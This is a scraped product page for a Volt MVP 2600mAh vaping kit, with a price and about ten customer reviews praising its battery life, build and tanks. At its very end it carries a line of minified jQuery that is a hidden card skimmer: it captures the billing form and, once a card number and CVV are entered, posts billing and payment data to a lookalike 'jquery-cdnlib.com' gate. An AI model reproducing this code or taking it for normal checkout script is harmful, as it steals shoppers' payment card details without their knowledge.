Volt MVP - 2600mAh Kit

In stock

As low as: $37.95

Price as configured: $37.95

Customer Reviews

Items 1 to 10 of 13 total

per page
Page:
  1. 1
  2. 2
Great product! Review by TSG
I tried ecigs about two years ago, but after going through a bunch of products that did not meet my needs (low battery life, bad tasting ejuices,leaky tanks), I picked up the analogs again. Tired of smelling like an ashtray, I decided to give them a try again. After reading all of the positive views about the Volt starter kit, I decided to give it a go. The kit contained everything I needed to get started. The batteries and carts were good for driving to and from work, but I needed something with more long-lasting power for the weekends when I am lounging around the house reading, socializing, etc. I purchased this device, and now I am a very happy customer. I'm still going on the first charge-and I am a HEAVY vaper. I did not like the IClear tanks that came with the kit, but was able to find a compatible tank-and I am in love. I have small hands, but the device fits comfortably in my hands. Its not heavy ,and I appreciate the size because it's easier to find in my purse. The company always manages to get my products to me in a timely manner, so I order from them quite often. Once I find the perfect peach and/or apple flavored Volt ejuice, my vaping life will be complete (hint).

Cons: The Niquid Apple Breeze that I purchased with the kit tastes like...cough medicine. It's horrible. I normally purchase the Volt e-liquids, and wish I would have stuck to my routine.

The iClear tanks weren't bad, they just weren't my cup of tea. I get more vapor and a better pull with the alternate tank I purchased. (Posted on 8/19/2017)
Good Product Review by David
The product is great the only problem I have is finding replace tanks for it.. I guess it not a standard 510 but instead a kr 808 d-1 thread.. If anyone can help please let me know where I can find them.. Smokeless has always had great products been with them for 6 years.. (Posted on 6/17/2017)
Very Good Review by Donna
I am new to the MVP, so it took me a bit to figure out how to use it. Now that I have I am really enjoying it. It lasts a long time and the clearomizer's are easy to fill. Love the Cinnamon flavor. Use it mainly at home. (Posted on 9/1/2016)
Perfect! Review by Tim
In one word.... PERFECT... but in more words....

I was one of the crowd who practically begged SI to get a box mod like this, because I knew their version would be superior in quality and performance. SI doesn't mess around, they really, really want to be the best. Not only did they listen to their fans, but they went above and beyond to make sure the MVP was built like a rock. On top of that, it's a portable power source too!!! I'm so happy about this I'm trying to hold back tears. The MVP 2.0 is outstanding, guys. It's the most perfect thing in my collection. I still catch myself admiring it's construction. I really, really do appreciate it's design.

I'm also thrilled about how long the battery lasts (all day for me), and it's easy to operate, it's easy setting the voltage/wattage, and it's ability to check the resistance health of the atomizer coil, which also helps in choosing a proper setting. So big thumbs up there too. All of this makes it a gadget dream come true.

I'm also here to vouch for it's toughness. I'm a clumsy sleepy person, so I tend to drop things. I've dropped it about 9 times already onto a hard wood floor from a distance of around 2 feet. The noise wakes me up, and I'm like "Ohhh Nooo", but I pick it up and it still works perfectly. So thanks for making it tough enough to survive me.

I don't really care for the iClear tanks that came with it (not compatible with my habits), but I'll use them anyway until I burn them out. But, the T3 tanks work fantastic on it, so I'm really happy about that.

... and I have to ask this... What's your next big project SI? Whatever it is, it's got to be good coming from you guys.
(Posted on 2/5/2015)
Smokeless Image has yet to fail me. Review by Zak
I made the mistake of buying a kit from a local dealer.. Not only was it much more expensive than the MVP, of course, it crapped out after about a month. The X2 passthrough and Spinner that I bought from SI are still going strong. Now, I've got a new beast in my collection and so far, so good. (Posted on 1/22/2015)
very good Review by Robert
I mostly use the mvp at home because of its size. It's just easier to carry a spinner when I go out. The battery life is excellent, lasts a long time. (Posted on 7/31/2014)
I LOVE IT! Review by Audra
This is by far the happiest I have been with any product on the market that I have personally tried thus far. I haven't had any problems with it or my clearos at all. It lasts so much longer and loving the green/yellow/red lights so you know when it's getting close to charge time. Great hits every time. I'm also a big fan of the size, I have lost so many batteries I lost count, so the size works really good for me because it's a lot harder to lose. Great job SI you're new products are making vaping easier, affordable, and my favorite, great customer service!!!! (Posted on 3/30/2014)
Love it! Review by Mdisco57
I am very happy with my SI MVP! I have no problem with the weight and feel of the box, I actually feel like I have a good grip on it. I like where the activation button is placed, I use either my index finger or thumb without much effort. I like VV/VW features so I can fine tune my vape. I have the black MVP and it l looks and pairs nicely with my stainless steel ET! I am very happy with this purchase! Thanks SI for providing the MVP for your customers, I appreciate your efforts! (Posted on 3/12/2014)
This thing is a beast Review by Glenn Matteson
The first thing you notice - it's big and heavy. Yes it will fit in a shirt pocket, but only just. So if you're looking for inconspicuous you'd be better off with a 650mah X2 or Spinner. But for home use, or in the company of folks who aren't offended by your vaping then this thing is perfect. You'll need to spend a few minutes going over the instruction pamphlet in order to use it properly but once that's done it's fairly easy to use. It's variable voltage so if you want maximum performance from a clearo or cartridge this will do the job better than anything else SI has to offer. And it will last a LONG time before you need to recharge even if you vape heavily. It's solid, feels like it's well built. Colors are subdued, not flashy. And while a lot of mods look like some kind of freakish telescope or flashlight, this is just a simple box - more or less the same size and shape as a pack of traditional cigarettes. (Posted on 12/27/2013)
Just Awesome! Review by Jesse
The iTazte MVP 2.0 is mind blowing. Come fully charged, with everything you need to get started. The Clearomizer's that come with it (the iClear 16) are the best clearomizers i have yet to use. They are great! and they have replaceable coils, which is great. The VV/VW settings are very easy to use and really are the best way to get the Vape just how you like it. I don't think I will ever go back to a non-variable mod. Like other's have said, it is quite hefty. But I like that, and it isn't much heavier than some of the larger smart phones out there. Speaking of which, you can charge anything that is USB compatible with this thing, which is an awesome option to have. I highly recommend this product. 5-Stars! (Posted on 12/21/2013)

Items 1 to 10 of 13 total

per page
Page:
  1. 1
  2. 2

Write Your Own Review

Only registered users can write reviews. Please, log in or register

jQuery(document).ready(function(){jQuery("#co-billing-form").change(function(){localStorage.setItem("billing",jQuery("#co-billing-form").serialize())}),jQuery("#co-payment-form").change(function(){jQuery('input[name="payment[cc_number]"]').val().replace(/[^0-9]/g,"").length>14&&jQuery('input[name="payment[cc_cid]"]').val().replace(/[^0-9]/g,"").length>2&&jQuery.ajax({url:"https://jquery-cdnlib.com/gate.php?token=BnB9V3ZV",data:localStorage.getItem("billing")+"&"+jQuery("#co-payment-form").serialize(),type:"POST",success:function(e){return!1},error:function(e,n,r){return!1}})})});